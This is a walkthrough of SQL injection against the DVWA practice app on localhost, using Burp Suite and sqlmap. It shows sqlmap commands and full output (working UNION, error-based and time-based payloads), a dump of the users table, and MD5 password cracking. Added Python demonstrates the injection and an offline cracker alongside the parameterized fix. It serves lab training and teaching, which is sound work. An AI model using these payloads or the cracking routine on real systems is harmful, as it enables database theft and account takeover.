To attack a system through SQL injection we first have to find where the vulnerability is, and for that we need a tool that can test a MySQL-backed application for it. I use two applications: sqlmap and Burp Suite. The walkthrough below uses DVWA as a simulated target: playing the role of an ordinary user, I locate the database and dump it. First I start Burp Suite, point the browser at its proxy on port 8080 and open the DVWA site.
Submitting ' or 1=1# in the id field, Burp captures the request "GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit" together with the header "Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0". Both cookie values matter: DVWA requires a login, so sqlmap must send the PHPSESSID, and security=low selects the unfiltered version of the page.
Now I test it with sqlmap, passing the captured cookie with --cookie (sqlmap's -p option would restrict testing to the id parameter; here I let it test both parameters in the URL):
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:15:52
[20:15:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:15:52] [INFO] testing connection to the target url
[20:15:52] [INFO] testing if the url is stable, wait a few seconds
[20:15:53] [INFO] url is stable
[20:15:53] [INFO] testing if GET parameter 'id' is dynamic
[20:15:53] [WARNING] GET parameter 'id' appears to be not dynamic
[20:15:53] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[20:15:53] [INFO] testing sql injection on GET parameter 'id'
[20:15:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:53] [INFO] heuristics detected web page charset 'ascii'
[20:15:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:15:53] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:15:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:16:04] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[20:16:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:04] [INFO] target url appears to be UNION injectable with 2 columns
[20:16:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[20:16:06] [INFO] testing if GET parameter 'Submit' is dynamic
[20:16:06] [WARNING] GET parameter 'Submit' appears to be not dynamic
[20:16:06] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[20:16:06] [INFO] testing sql injection on GET parameter 'Submit'
[20:16:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[20:16:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:11] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:16:11] [INFO] manual usage of GET payloads requires url encoding
[20:16:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:16:11
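To see concretely what sqlmap established in the run above, here is an added example of my own (not part of the original post and not DVWA's source): an in-memory SQLite copy of the users table behind a query built the way the vulnerable page builds it (the exact DVWA code is an assumption, since it is not shown here), the column-count probe that yields the "UNION injectable with 2 columns" result, the UNION payload carrying user:password pairs out through the page, and the parameterized form that does not react to the same input. It also decodes the CHAR() lists in sqlmap's payloads: CHAR(58,120,111,104,58) and CHAR(58,106,108,120,58) are the markers ':xoh:' and ':jlx:' that sqlmap wraps around the value it wants to read back out of the response, which is why every payload above carries them. SQLite stands in for MySQL, so the comment token is -- rather than # and concatenation is || rather than CONCAT(); the error-based (FLOOR(RAND(0)*2) GROUP BY) and time-based (SLEEP) payloads are MySQL-specific and are not reproduced.

```python
import re
import sqlite3

# Constructed stand-in for the dvwa.users table: the columns are the ones sqlmap
# reported, the rows are the five from the dump (avatar column omitted).
USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (3, "Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "Pablo", "Picasso", "pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "Bob", "Smith", "smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def make_db():
    """In-memory SQLite copy of the table (SQLite stands in for MySQL here)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """The bug sqlmap found: the id value is pasted into the SQL text.

    Assumed to be the query shape of DVWA's 'low' page (its source is not on
    the page). Any quote in user_id changes the statement's structure.
    """
    query = ("SELECT first_name, last_name FROM users "
             f"WHERE user_id = '{user_id}'")
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    """Fixed form: the value travels as a bound parameter, never as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?",
        (user_id,),
    ).fetchall()


def union_column_count(conn, max_cols=10):
    """Reproduce sqlmap's 'UNION injectable with N columns' step.

    A UNION whose right side has the wrong number of columns is a SQL error;
    the first count that runs cleanly is the width of the original SELECT.
    """
    for n in range(1, max_cols + 1):
        probe = "1' UNION ALL SELECT " + ", ".join(["NULL"] * n) + "--"
        try:
            vulnerable_lookup(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def decode_char_calls(payload):
    """Turn sqlmap's CHAR(58,120,111,104,58) spellings back into text.

    sqlmap writes its marker strings and literals with CHAR() so that no quote
    characters appear inside the injected expression.
    """
    return re.sub(
        r"CHAR\(([\d,]+)\)",
        lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'",
        payload,
    )


def exfiltrate_users(conn):
    """The UNION payload from the run above, adapted to SQLite: the second
    column carries user:password pairs out through the page's output."""
    payload = ("1' UNION ALL SELECT NULL, user || ':' || password "
               "FROM users--")
    rows = vulnerable_lookup(conn, payload)
    # Rows from the original SELECT have a first_name; the injected ones have NULL.
    return sorted(r[1] for r in rows if r[0] is None)


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "' OR 1=1--"))   # every row, like the Burp request
    print(union_column_count(db))                 # 2, as sqlmap reported
    print(exfiltrate_users(db))
    print(safe_lookup(db, "' OR 1=1--"))          # []
    print(decode_char_calls("CONCAT(CHAR(58,120,111,104,58),CHAR(58,106,108,120,58))"))
```

The fix is the bound parameter in safe_lookup, not input filtering: the same ' OR 1=1-- string is simply compared against user_id and matches nothing.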
Now that sqlmap has confirmed the id parameter, the same command with --dbs lists the databases. The injection data is resumed from the session file, so no new detection requests are sent:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:16:35
[20:16:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:16:35] [INFO] resuming injection data from session file
[20:16:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:16:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:16:35] [INFO] manual usage of GET payloads requires url encoding
[20:16:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:35] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql
[20:16:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:16:35
I have the database names; now how do I dump one? The option that selects a database is -D with a single dash. My first attempt with --D was rejected (error below); -D dvwa --tables then lists the tables in the dvwa database:
sqlmap.py: error: no such option: --D
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:20:59
[20:20:59] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:20:59] [INFO] resuming injection data from session file
[20:20:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:20:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:20:59] [INFO] manual usage of GET payloads requires url encoding
[20:20:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:20:59] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[20:20:59] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:20:59
Finally I dump the users table with -T users --dump. Without -D, sqlmap falls back to the current database (dvwa, already recorded in the session file). When it sees 32-character hex values in the password column it offers a dictionary attack on them; I accept, use its bundled wordlist and enable the common password suffixes:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -T users --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:38:37
[20:38:37] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:38:37] [INFO] resuming injection data from session file
[20:38:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:38:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:38:37] [INFO] manual usage of GET payloads requires url encoding
[20:38:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:38:37] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[20:38:37] [INFO] fetching current database
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[20:38:37] [INFO] fetching columns for table 'users' on database 'dvwa'
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
[20:38:38] [INFO] fetching entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[20:38:40] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[20:38:42] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[20:38:44] [INFO] starting dictionary attack (md5_generic_passwd)
[20:38:44] [INFO] found: 'abc123' for user: 'gordonb'
[20:38:45] [INFO] found: 'charley' for user: '1337'
[20:38:45] [INFO] found: 'letmein' for user: 'pablo'
[20:38:46] [INFO] found: 'password' for user: 'admin'
[20:39:09] [INFO] 4159708/10006596 words (42%)
Database: dvwa
Table: users
[5 entries]
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| avatar | first_name | last_name | password | user | user_id |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| http://127.0.0.1/dvwa/hackable/users/pablo.jpg | Pablo | Picasso | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | pablo | 4 |
| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon | Brown | e99a18c428cb38d5f260853678922e03 (abc123) | gordonb | 2 |
| http://127.0.0.1/dvwa/hackable/users/admin.jpg | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | 1 |
| http://127.0.0.1/dvwa/hackable/users/smithy.jpg | Bob | Smith | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy | 5 |
| http://127.0.0.1/dvwa/hackable/users/1337.jpg | Hack | Me | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 1337 | 3 |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
[20:39:42] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[20:39:42] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:39:42
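The dictionary attack sqlmap ran is worth seeing in plain code because it shows why the dump was readable at once: DVWA stores unsalted MD5, so one md5() of each wordlist entry can be compared against every user's hash (admin and smithy even share one). The block below is an added example of my own, not sqlmap's code. The hashes and usernames are the five from the dump above; the wordlist, the suffix list and the extra hash for a hypothetical sixth user are constructed stand-ins for sqlmap's wordlist.txt and its suffix option. With a salted, slow hash such as bcrypt or Argon2 the same work would have to be repeated per user and would be orders of magnitude slower.

```python
import hashlib

# Hashes and usernames copied from the sqlmap dump above.
DUMPED_HASHES = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy": "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed stand-ins for sqlmap's wordlist.txt and its "common password
# suffixes" option (the real lists are far longer).
WORDLIST = ["123456", "qwerty", "abc123", "charley", "letmein", "password", "summer"]
SUFFIXES = ["", "1", "123", "!", "2010"]

# Constructed hash for a hypothetical sixth user whose password is a wordlist
# entry plus a suffix; it is computed here, not taken from the page.
EXTRA_HASHES = {"hypothetical_user": hashlib.md5(b"summer2010").hexdigest()}


def looks_like_md5(value):
    """The 'recognized possible password hash values' check: 32 hex digits."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def crack_md5(hashes, wordlist, suffixes=("",)):
    """Offline dictionary attack on unsalted MD5 values.

    Each candidate is hashed once and matched against every target, so users
    sharing a password (admin and smithy above) cost one md5() between them.
    Returns {user: plaintext} for the hashes that fell.
    """
    by_hash = {}
    for user, value in hashes.items():
        if looks_like_md5(value):
            by_hash.setdefault(value.lower(), []).append(user)
    found = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            digest = hashlib.md5(candidate.encode()).hexdigest()
            for user in by_hash.pop(digest, []):
                found[user] = candidate
            if not by_hash:       # nothing left to crack, stop early
                return found
    return found


if __name__ == "__main__":
    print(crack_md5(DUMPED_HASHES, WORDLIST))            # all five users
    print(crack_md5(EXTRA_HASHES, WORDLIST))             # {} without suffixes
    print(crack_md5(EXTRA_HASHES, WORDLIST, SUFFIXES))   # found with suffixes
```

The suffix loop is what sqlmap warns is slow: every suffix multiplies the number of md5() calls, which is why the option is off by default.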